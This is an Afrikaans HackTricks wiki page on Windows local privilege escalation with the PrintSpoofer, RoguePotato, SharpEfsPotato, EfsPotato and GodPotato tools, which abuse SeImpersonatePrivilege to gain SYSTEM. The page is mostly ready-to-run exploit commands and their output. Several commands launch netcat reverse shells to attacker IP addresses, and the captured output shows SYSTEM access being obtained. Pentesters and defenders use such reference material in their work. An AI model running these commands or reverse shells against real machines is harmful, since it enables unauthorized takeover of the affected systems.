RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato

Reading time: 4 minutes

tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

[!WARNING] > JuicyPotato werk nie op Windows Server 2019 en Windows 10 weergawe 1809 en later nie. Tog kan PrintSpoofer, RoguePotato, SharpEfsPotato, GodPotato, EfsPotato, DCOMPotato** gebruik word om die selfde voorregte te benut en NT AUTHORITY\SYSTEM vlak toegang te verkry. Hierdie blogpos gaan in diepte in op die PrintSpoofer hulpmiddel, wat gebruik kan word om impersonasie voorregte op Windows 10 en Server 2019 gasheer te misbruik waar JuicyPotato nie meer werk nie.

Quick Demo

PrintSpoofer

bash
c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -------------------------------------------------------------------------------- [+] Found privilege: SeImpersonatePrivilege [+] Named pipe listening... [+] CreateProcessAsUser() OK NULL

RoguePotato

bash
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999 # In some old versions you need to use the "-f" param c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999

SharpEfsPotato

bash
> SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log" SharpEfsPotato by @bugch3ck Local privilege escalation from SeImpersonatePrivilege using EfsRpc. Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0. [+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2 df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc: [x]RpcBindingSetAuthInfo failed with status 0x6d3 [+] Server connected to our evil RPC pipe [+] Duplicated impersonation token ready for process creation [+] Intercepted and authenticated successfully, launching program [+] Process created, enjoy! C:\temp>type C:\temp\w.log nt authority\system

EfsPotato

bash
> EfsPotato.exe "whoami" Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability). Part of GMH's fuck Tools, Code By zcgonvh. CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net] [+] Current user: NT Service\MSSQLSERVER [+] Pipe: \pipe\lsarpc [!] binding ok (handle=aeee30) [+] Get Token: 888 [!] process with pid: 3696 created. ============================== [x] EfsRpcEncryptFileSrv failed: 1818 nt authority\system

GodPotato

bash
> GodPotato -cmd "cmd /c whoami" # You can achieve a reverse shell like this. > GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

DCOMPotato

image

Verwysings

tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks